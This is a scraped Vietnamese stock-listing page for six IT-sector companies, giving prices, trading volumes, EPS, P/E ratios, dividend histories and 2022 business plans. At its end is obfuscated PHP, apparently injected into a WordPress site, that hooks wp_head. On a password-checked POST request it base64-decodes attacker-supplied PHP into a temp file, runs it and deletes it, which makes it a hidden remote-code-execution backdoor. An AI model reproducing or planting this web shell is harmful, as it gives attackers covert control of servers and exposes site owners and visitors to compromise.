Công Nghệ Thông Tin

Dầu Khí - Tài Nguyên Cơ Bản - Hàng Hóa và Dịch Vụ Công Nghiệp - Thực Phẩm và Đồ Uống - Y Tế - Truyền Thông - Viễn Thông - Ngân Hàng - Bất Động Sản - Công Nghệ Thông Tin - Hóa Chất - Xây Dựng và Vật Liệu - OTO và Phụ Tùng - Hàng Cá Nhân và Gia Dụng - Bán Lẻ - Du Lịch và Giải Trí - Điện, nước & xăng dầu khí đốt - Bảo hiểm - Dịch vụ tài chính

1 : SRA - Công ty Cổ phần Sara Việt Nam

[Trung bình 20 ngày = 339,426 - khối lượng giao dịch ngày gần nhất 249,600 Tỷ Lệ: 0.7] Giá Cp hiện tại: 7,4 -- Giá Cp ngày trước: 7,4
Giá mua: 7,4 - Tăng vọt(T:-16%) so với Ma20: 8.31 và (T:-15%) so với ĐCB: 8.26 - Thay đổi CN(-42%, Giá:12) - TN(INF%, Giá:0)

Khối Ngoại Mua: 0 - Bán: 0 Chênh lệch : 0

Công Nghệ Thông Tin - Sức mạnh trong ngành: 1 Điểm Cân Bằng: 8.26EPS cơ bản1.865
EPS pha loãng1.865
P/E4
Giá trị sổ sách /cp14.607
KLCP đang niêm yết43.199.974
KLCP đang lưu hành43.199.974
Vốn hóa thị trường328
Giá trị cổ tức gần nhất10
Giá trị cao nhất 52 tuần12,8
Giá trị thấp nhất 52 tuần6,1
Lợi nhuận sau thuế
Tổng tài sản663
Vốn chủ sở hữu631
Vốn điều lệ432
ROA13,04
ROE13,45
Ngày giao dịch đầu tiên: 18/01/2008
Giá đóng cửa phiên GD đầu tiên(nghìn đồng): 52.0
Khối lượng cổ phiếu niêm yết lần đầu: 1,000,000
Lịch sử trả cổ tức chia thưởng và tăng vốn ≫
- 25/01/2021: Phát hành riêng lẻ 18,000,000
- 05/11/2020: Cổ tức bằng Cổ phiếu, tỷ lệ 100:40
                           Cổ tức bằng Tiền, tỷ lệ 20%
- 16/01/2019: Bán ưu đãi, tỷ lệ 1:8, giá 10000 đ/cp
- 12/12/2008: Cổ tức bằng Tiền, tỷ lệ 13%
(*) Ngày hiển thị là ngày GD không hưởng quyền
(**) Ngày hiển thị là ngày phát hành

KẾ HOẠCH KINH DOANH NĂM 2021

 • Doanh thu
  469 tỷ
 • Lợi nhuận trước thuế
  142.2 tỷ
 • Lợi nhuận sau thuế
  134.7 tỷ
 • Cổ tức bằng tiền mặt
  20 %
 • Cổ tức bằng cổ phiếu
  N/A
 • Dự kiến tăng vốn lên
  N/A

Tốc độ tăng trưởng eps năm 1 là: -0.78 (EPS Năm 1 là: 1.02)
Tốc độ tăng trưởng eps năm 2 là: -0.91 (EPS Năm 2 là: 4.63)
Tốc độ tăng trưởng eps năm 3 là: 8.12 (EPS Năm 3 là: 51.41)
Tốc độ tăng trưởng eps bình quân 3 năm là: 2.14


2 : FPT - Công ty Cổ phần FPT

[Trung bình 20 ngày = 2,419,105 - khối lượng giao dịch ngày gần nhất 1,008,000 Tỷ Lệ: 0.4] Giá Cp hiện tại: 86,2 -- Giá Cp ngày trước: 87,0
Giá mua: 86,2 - Tăng vọt(T:-14%) so với Ma20: 100.28 và (T:-15%) so với ĐCB: 100.65 - Thay đổi CN(-26%, Giá:116.6) - TN(-6%, Giá:91.6)

Khối Ngoại Mua: 4,838,700 - Bán: 4,840,600 Chênh lệch : -1,900

Công Nghệ Thông Tin - Sức mạnh trong ngành: 2 Điểm Cân Bằng: 100.65EPS cơ bản4.505
EPS pha loãng4.505
P/E19
Giá trị sổ sách /cp21.341
KLCP đang niêm yết1.097.026.572
KLCP đang lưu hành1.097.026.572
Vốn hóa thị trường94.344
Giá trị cổ tức gần nhất10
Giá trị cao nhất 52 tuần116,6
Giá trị thấp nhất 52 tuần82,2
Lợi nhuận sau thuế
Tổng tài sản56.296
Vốn chủ sở hữu23.412
Vốn điều lệ10.970
ROA9,2
ROE22,32
Ngày giao dịch đầu tiên: 13/12/2006
Giá đóng cửa phiên GD đầu tiên(nghìn đồng): 400.0
Khối lượng cổ phiếu niêm yết lần đầu: 60,810,230
Lịch sử trả cổ tức chia thưởng và tăng vốn ≫
- 13/06/2022: Cổ tức bằng Cổ phiếu, tỷ lệ 5:1
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 10/05/2022: Phát hành cho CBCNV 2,107,000
                           Phát hành cho CBCNV 4,537,265
- 16/08/2021: Cổ tức bằng Tiền, tỷ lệ 10%
- 01/06/2021: Cổ tức bằng Cổ phiếu, tỷ lệ 20:3
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 07/04/2021: Phát hành cho CBCNV 1,290,300
                           Phát hành cho CBCNV 3,919,468
- 17/08/2020: Cổ tức bằng Tiền, tỷ lệ 10%
- 13/05/2020: Cổ tức bằng Cổ phiếu, tỷ lệ 20:3
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 26/03/2020: Phát hành cho CBCNV 3,391,790
- 15/08/2019: Cổ tức bằng Tiền, tỷ lệ 10%
- 17/05/2019: Cổ tức bằng Cổ phiếu, tỷ lệ 10:1
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 01/04/2019: Phát hành riêng lẻ 3,067,200
- 16/08/2018: Cổ tức bằng Tiền, tỷ lệ 10%
- 25/05/2018: Cổ tức bằng Cổ phiếu, tỷ lệ 20:3
                           Cổ tức bằng Tiền, tỷ lệ 15%
- 03/04/2018: Phát hành cho CBCNV 2,654,556
- 17/08/2017: Cổ tức bằng Tiền, tỷ lệ 10%
- 25/05/2017: Cổ tức bằng Cổ phiếu, tỷ lệ 20:3
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 04/04/2017: Phát hành cho CBCNV 2,296,370
- 22/08/2016: Cổ tức bằng Tiền, tỷ lệ 10%
- 27/05/2016: Cổ tức bằng Cổ phiếu, tỷ lệ 20:3
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 05/04/2016: Phát hành cho CBCNV 1,986,829
- 19/08/2015: Cổ tức bằng Tiền, tỷ lệ 10%
- 28/05/2015: Cổ tức bằng Cổ phiếu, tỷ lệ 20:3
                           Cổ tức bằng Tiền, tỷ lệ 10%
- 20/04/2015: Phát hành cho CBCNV 1,719,317
- 20/08/2014: Cổ tức bằng Tiền, tỷ lệ 10%
- 08/05/2014: Cổ tức bằng Cổ phiếu, tỷ lệ 4:1
- 07/05/2014: Cổ tức bằng Tiền, tỷ lệ 15%
- 15/08/2013: Cổ tức bằng Tiền, tỷ lệ 15%
- 05/12/2012: Cổ tức bằng Tiền, tỷ lệ 10%
- 27/08/2012: Cổ tức bằng Tiền, tỷ lệ 10%
- 17/05/2012: Cổ tức bằng Cổ phiếu, tỷ lệ 4:1
- 15/05/2012: Cổ tức bằng Tiền, tỷ lệ 10%
- 27/09/2011: Cổ tức bằng Tiền, tỷ lệ 10%
- 05/05/2011: Cổ tức bằng Tiền, tỷ lệ 5%
- 11/08/2010: Cổ tức bằng Tiền, tỷ lệ 10%
- 13/05/2010: Cổ tức bằng Cổ phiếu, tỷ lệ 3:1
- 14/12/2009: Cổ tức bằng Tiền, tỷ lệ 15%
- 04/06/2009: Cổ tức bằng Tiền, tỷ lệ 10%
(*) Ngày hiển thị là ngày GD không hưởng quyền
(**) Ngày hiển thị là ngày phát hành

KẾ HOẠCH KINH DOANH NĂM 2022

 • Doanh thu
  42,420 tỷ
 • Lợi nhuận trước thuế
  7,618 tỷ
 • Lợi nhuận sau thuế
  N/A
 • Cổ tức bằng tiền mặt
  20 %
 • Cổ tức bằng cổ phiếu
  N/A
 • Dự kiến tăng vốn lên
  N/A

Tốc độ tăng trưởng eps năm 1 là: -0.02 (EPS Năm 1 là: 4.12)
Tốc độ tăng trưởng eps năm 2 là: 0.08 (EPS Năm 2 là: 4.22)
Tốc độ tăng trưởng eps năm 3 là: -0.24 (EPS Năm 3 là: 3.9)
Tốc độ tăng trưởng eps bình quân 3 năm là: -0.06


3 : ITD - Công ty Cổ phần Công nghệ Tiên Phong

[Trung bình 20 ngày = 185,765 - khối lượng giao dịch ngày gần nhất 136,500 Tỷ Lệ: 0.7] Giá Cp hiện tại: 11,65 -- Giá Cp ngày trước: 11,5
Giá mua: 11,65 - Tăng vọt(T:-19%) so với Ma20: 13.56 và (T:-20%) so với ĐCB: 13.72 - Thay đổi CN(-42%, Giá:19) - TN(-11%, Giá:12.4)

Khối Ngoại Mua: 5,200 - Bán: 15,700 Chênh lệch : -10,500

Công Nghệ Thông Tin - Sức mạnh trong ngành: 3 Điểm Cân Bằng: 13.72EPS cơ bản944
EPS pha loãng944
P/E13
Giá trị sổ sách /cp18.232
KLCP đang niêm yết21.271.466
KLCP đang lưu hành21.343.654
Vốn hóa thị trường263
Giá trị cổ tức gần nhất10
Giá trị cao nhất 52 tuần26,4
Giá trị thấp nhất 52 tuần11,15
Lợi nhuận sau thuế
Tổng tài sản591
Vốn chủ sở hữu388
Vốn điều lệ213
ROA3,42
ROE5,55
Chi tiết
Giao dịch đầu tiên tại UPCOM:04/12/2009
Với Khối lượng (cp):11,610,399
Giá đóng cửa trong ngày (nghìn đồng):26.0
Ngày giao dịch cuối cùng:02/12/2011
Ngày giao dịch đầu tiên: 20/12/2011
Giá đóng cửa phiên GD đầu tiên(nghìn đồng): 10.0
Khối lượng cổ phiếu niêm yết lần đầu: 11,610,399
Lịch sử trả cổ tức chia thưởng và tăng vốn ≫
- 08/02/2022: Cổ tức bằng Cổ phiếu, tỷ lệ 100:12
- 16/11/2020: Cổ tức bằng Tiền, tỷ lệ 10%
- 15/11/2019: Cổ tức bằng Tiền, tỷ lệ 12%
- 13/02/2019: Cổ tức bằng Tiền, tỷ lệ 5%
- 21/12/2018: Cổ tức bằng Tiền, tỷ lệ 5%
- 12/10/2018: Cổ tức bằng Tiền, tỷ lệ 9%
- 18/12/2017: Cổ tức bằng Tiền, tỷ lệ 6%
- 07/08/2017: Cổ tức bằng Tiền, tỷ lệ 10%
- 19/01/2017: Cổ tức bằng Tiền, tỷ lệ 10%
- 28/10/2016: Phát hành cho CBCNV 675,270
- 25/08/2016: Cổ tức bằng Cổ phiếu, tỷ lệ 100:20
- 19/05/2016: Cổ tức bằng Tiền, tỷ lệ 10%
- 18/09/2015: Phát hành cho CBCNV 638,480
- 04/09/2015: Cổ tức bằng Cổ phiếu, tỷ lệ 100:15
- 04/06/2012: Cổ tức bằng Tiền, tỷ lệ 12%
- 04/01/2012: Cổ tức bằng Cổ phiếu, tỷ lệ 10%
- 17/05/2011: Cổ tức bằng Tiền, tỷ lệ 8%
- 18/10/2010: Cổ tức bằng Tiền, tỷ lệ 4%
- 24/05/2010: Cổ tức bằng Tiền, tỷ lệ 8%
(*) Ngày hiển thị là ngày GD không hưởng quyền
(**) Ngày hiển thị là ngày phát hành

KẾ HOẠCH KINH DOANH NĂM 2022

 • Doanh thu
  820 tỷ
 • Lợi nhuận trước thuế
  N/A
 • Lợi nhuận sau thuế
  N/A
 • Cổ tức bằng tiền mặt
  10 %
 • Cổ tức bằng cổ phiếu
  N/A
 • Dự kiến tăng vốn lên
  N/A

Tốc độ tăng trưởng eps năm 1 là: 0 (EPS Năm 1 là: )
Tốc độ tăng trưởng eps năm 2 là: 0 (EPS Năm 2 là: )
Tốc độ tăng trưởng eps năm 3 là: 0 (EPS Năm 3 là: )
Tốc độ tăng trưởng eps bình quân 3 năm là: 0


4 : ELC - Công ty Cổ phần Đầu tư Phát triển Công nghệ Điện tử Viễn thông

[Trung bình 20 ngày = 647,065 - khối lượng giao dịch ngày gần nhất 344,900 Tỷ Lệ: 0.5] Giá Cp hiện tại: 16,55 -- Giá Cp ngày trước: 16,4
Giá mua: 16,55 - Tăng vọt(T:-14%) so với Ma20: 18.65 và (T:-14%) so với ĐCB: 18.5 - Thay đổi CN(-46%, Giá:29.4) - TN(-0%, Giá:16.05)

Khối Ngoại Mua: 218,300 - Bán: 122,000 Chênh lệch : 96,300

Công Nghệ Thông Tin - Sức mạnh trong ngành: 4 Điểm Cân Bằng: 18.5EPS cơ bản947
EPS pha loãng947
P/E19
Giá trị sổ sách /cp17.580
KLCP đang niêm yết50.928.243
KLCP đang lưu hành50.928.243
Vốn hóa thị trường917
Giá trị cổ tức gần nhất3
Giá trị cao nhất 52 tuần30,65
Giá trị thấp nhất 52 tuần13,3
Lợi nhuận sau thuế
Tổng tài sản1.096
Vốn chủ sở hữu895
Vốn điều lệ509
ROA4,13
ROE5,49
Ngày giao dịch đầu tiên: 13/10/2010
Giá đóng cửa phiên GD đầu tiên(nghìn đồng): 55.0
Khối lượng cổ phiếu niêm yết lần đầu: 22,125,000
Lịch sử trả cổ tức chia thưởng và tăng vốn ≫
- 19/07/2021: Cổ tức bằng Tiền, tỷ lệ 6%
- 20/09/2017: Cổ tức bằng Cổ phiếu, tỷ lệ 100:7
                           Cổ tức bằng Tiền, tỷ lệ 2%
- 18/07/2017: Phát hành cho CBCNV 116,500
- 19/04/2017: Cổ tức bằng Tiền, tỷ lệ 6%
- 22/03/2017: Phát hành cho CBCNV 1,000,000
- 06/07/2016: Cổ tức bằng Cổ phiếu, tỷ lệ 10:1
- 12/04/2016: Phát hành cho CBCNV 800,000
- 17/03/2016: Cổ tức bằng Tiền, tỷ lệ 6%
- 25/12/2015: Phát hành cho CBCNV 600,000
- 25/06/2015: Thưởng bằng Cổ phiếu, tỷ lệ 100:8
- 24/03/2015: Cổ tức bằng Tiền, tỷ lệ 12%
- 24/03/2014: Cổ tức bằng Tiền, tỷ lệ 8%
- 11/02/2014: Phát hành cho CBCNV 600,000
- 16/11/2013: Phát hành cho CBCNV 715,000
- 28/06/2013: Cổ tức bằng Tiền, tỷ lệ 8%
- 02/01/2013: Cổ tức bằng Tiền, tỷ lệ 10%
- 16/04/2012: Cổ tức bằng Tiền, tỷ lệ 8%
- 10/04/2012: Cổ tức bằng Cổ phiếu, tỷ lệ 25%
- 02/12/2011: Cổ tức bằng Tiền, tỷ lệ 10%
- 27/04/2011: Cổ tức bằng Tiền, tỷ lệ 15%
- 04/11/2010: Cổ tức bằng Tiền, tỷ lệ 9%
(*) Ngày hiển thị là ngày GD không hưởng quyền
(**) Ngày hiển thị là ngày phát hành

KẾ HOẠCH KINH DOANH NĂM 2022

 • Doanh thu
  1,000 tỷ
 • Lợi nhuận trước thuế
  N/A
 • Lợi nhuận sau thuế
  70 tỷ
 • Cổ tức bằng tiền mặt
  12 %
 • Cổ tức bằng cổ phiếu
  N/A
 • Dự kiến tăng vốn lên
  N/A

Tốc độ tăng trưởng eps năm 1 là: 0.07 (EPS Năm 1 là: 0.63)
Tốc độ tăng trưởng eps năm 2 là: 2.28 (EPS Năm 2 là: 0.59)
Tốc độ tăng trưởng eps năm 3 là: -0.8 (EPS Năm 3 là: 0.18)
Tốc độ tăng trưởng eps bình quân 3 năm là: 0.52


5 : SAM - Công ty Cổ phần SAM Holdings

[Trung bình 20 ngày = 1,051,435 - khối lượng giao dịch ngày gần nhất 2,425,600 Tỷ Lệ: 2.3] Giá Cp hiện tại: 13,8 -- Giá Cp ngày trước: 13,6
Giá mua: 13,8 - Tăng vọt(T:9%) so với Ma20: 11.91 và (T:9%) so với ĐCB: 11.95 - Thay đổi CN(-37%, Giá:20.7) - TN(20%, Giá:10.85)

Khối Ngoại Mua: 493,300 - Bán: 829,600 Chênh lệch : -336,300

Công Nghệ Thông Tin - Sức mạnh trong ngành: 5 Điểm Cân Bằng: 11.95EPS cơ bản486
EPS pha loãng486
P/E29
Giá trị sổ sách /cp12.664
KLCP đang niêm yết365.353.065
KLCP đang lưu hành365.353.065
Vốn hóa thị trường5.078
Giá trị cổ tức gần nhất5
Giá trị cao nhất 52 tuần29
Giá trị thấp nhất 52 tuần9,5
Lợi nhuận sau thuế
Tổng tài sản9.023
Vốn chủ sở hữu4.627
Vốn điều lệ3.654
ROA2,26
ROE3,88
Ngày giao dịch đầu tiên: 28/07/2000
Giá đóng cửa phiên GD đầu tiên(nghìn đồng): 17.0
Khối lượng cổ phiếu niêm yết lần đầu: 18,000,000
Lịch sử trả cổ tức chia thưởng và tăng vốn ≫
- 21/01/2022: Cổ tức bằng Cổ phiếu, tỷ lệ 10000:439
- 15/01/2021: Bán ưu đãi, tỷ lệ 100:36.45, giá 10000 đ/cp
- 24/09/2019: Cổ tức bằng Cổ phiếu, tỷ lệ 100:3
- 19/12/2018: Cổ tức bằng Cổ phiếu, tỷ lệ 100:3
- 28/09/2017: Thưởng bằng Cổ phiếu, tỷ lệ 100:34.15
- 19/08/2015: Thưởng bằng Cổ phiếu, tỷ lệ 1:0.3
- 12/06/2015: Cổ tức bằng Tiền, tỷ lệ 5%
- 27/01/2015: Thưởng bằng Cổ phiếu, tỷ lệ 100:6
- 14/03/2014: Cổ tức bằng Tiền, tỷ lệ 6%
- 22/04/2010: Cổ tức bằng Tiền, tỷ lệ 12%
- 21/10/2009: Cổ tức bằng Tiền, tỷ lệ 10%
- 04/04/2008: Cổ tức bằng Tiền, tỷ lệ 17%
- 17/09/2007: Cổ tức bằng Tiền, tỷ lệ 8%
- 14/05/2007: Bán ưu đãi, tỷ lệ 5:1, giá 20k/cp
(*) Ngày hiển thị là ngày GD không hưởng quyền
(**) Ngày hiển thị là ngày phát hành

KẾ HOẠCH KINH DOANH NĂM 2022

 • Doanh thu
  2,855.8 tỷ
 • Lợi nhuận trước thuế
  210.7 tỷ
 • Lợi nhuận sau thuế
  N/A
 • Cổ tức bằng tiền mặt
  5 %
 • Cổ tức bằng cổ phiếu
  N/A
 • Dự kiến tăng vốn lên
  N/A

Tốc độ tăng trưởng eps năm 1 là: 0.16 (EPS Năm 1 là: 0.36)
Tốc độ tăng trưởng eps năm 2 là: -0.21 (EPS Năm 2 là: 0.31)
Tốc độ tăng trưởng eps năm 3 là: -0.09 (EPS Năm 3 là: 0.39)
Tốc độ tăng trưởng eps bình quân 3 năm là: -0.05


6 : SMT - Công ty cổ phần SAMETEL

[Trung bình 20 ngày = 42,707 - khối lượng giao dịch ngày gần nhất 35,000 Tỷ Lệ: 0.8] Giá Cp hiện tại: 13,9 -- Giá Cp ngày trước: 14,0
Giá mua: 13,9 - Tăng vọt(T:-10%) so với Ma20: 14.37 và (T:-8%) so với ĐCB: 14.19 - Thay đổi CN(-45%, Giá:23.6) - TN(INF%, Giá:0)

Khối Ngoại Mua: 0 - Bán: 0 Chênh lệch : 0

Công Nghệ Thông Tin - Sức mạnh trong ngành: 6 Điểm Cân Bằng: 14.19EPS cơ bản192
EPS pha loãng192
P/E73
Giá trị sổ sách /cp11.997
KLCP đang niêm yết5.467.432
KLCP đang lưu hành5.467.432
Vốn hóa thị trường77
Giá trị cổ tức gần nhất10
Giá trị cao nhất 52 tuần44
Giá trị thấp nhất 52 tuần7,5
Lợi nhuận sau thuế
Tổng tài sản250
Vốn chủ sở hữu66
Vốn điều lệ55
ROA0,44
ROE1,54
Ngày giao dịch đầu tiên: 30/07/2010
Giá đóng cửa phiên GD đầu tiên(nghìn đồng): 19.0
Khối lượng cổ phiếu niêm yết lần đầu: 2,500,000
Lịch sử trả cổ tức chia thưởng và tăng vốn ≫
- 14/07/2020: Cổ tức bằng Tiền, tỷ lệ 10%
- 27/03/2020: Cổ tức bằng Tiền, tỷ lệ 5%
- 04/09/2018: Cổ tức bằng Tiền, tỷ lệ 12%
- 01/09/2017: Cổ tức bằng Tiền, tỷ lệ 12%
- 20/09/2016: Bán ưu đãi, tỷ lệ 100:22, giá 14000 đ/cp
                           Cổ tức bằng Tiền, tỷ lệ 15%
- 04/06/2015: Cổ tức bằng Cổ phiếu, tỷ lệ 100:12
- 19/11/2014: Bán ưu đãi, tỷ lệ 10:3, giá 10000 đ/cp
                           Cổ tức bằng Tiền, tỷ lệ 12%
- 21/06/2013: Cổ tức bằng Tiền, tỷ lệ 7%
- 25/11/2010: Cổ tức bằng Tiền, tỷ lệ 6%
(*) Ngày hiển thị là ngày GD không hưởng quyền
(**) Ngày hiển thị là ngày phát hành

KẾ HOẠCH KINH DOANH NĂM 2022

 • Doanh thu
  726.7 tỷ
 • Lợi nhuận trước thuế
  23.24 tỷ
 • Lợi nhuận sau thuế
  18.59 tỷ
 • Cổ tức bằng tiền mặt
  10 %
 • Cổ tức bằng cổ phiếu
  N/A
 • Dự kiến tăng vốn lên
  N/A

Tốc độ tăng trưởng eps năm 1 là: -1.44 (EPS Năm 1 là: 0.69)
Tốc độ tăng trưởng eps năm 2 là: -1.68 (EPS Năm 2 là: -1.58)
Tốc độ tăng trưởng eps năm 3 là: 0.02 (EPS Năm 3 là: 2.31)
Tốc độ tăng trưởng eps bình quân 3 năm là: -1.03


Bất động sản, ngân hàng biến động, tỷ phú, người nhà chốt thương vụ nghìn tỷ

Nhóm cổ phiếu bất động sản và ngân hàng tiếp tục biến động mạnh. Tập đoàn Đầu tư Việt Nam…

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}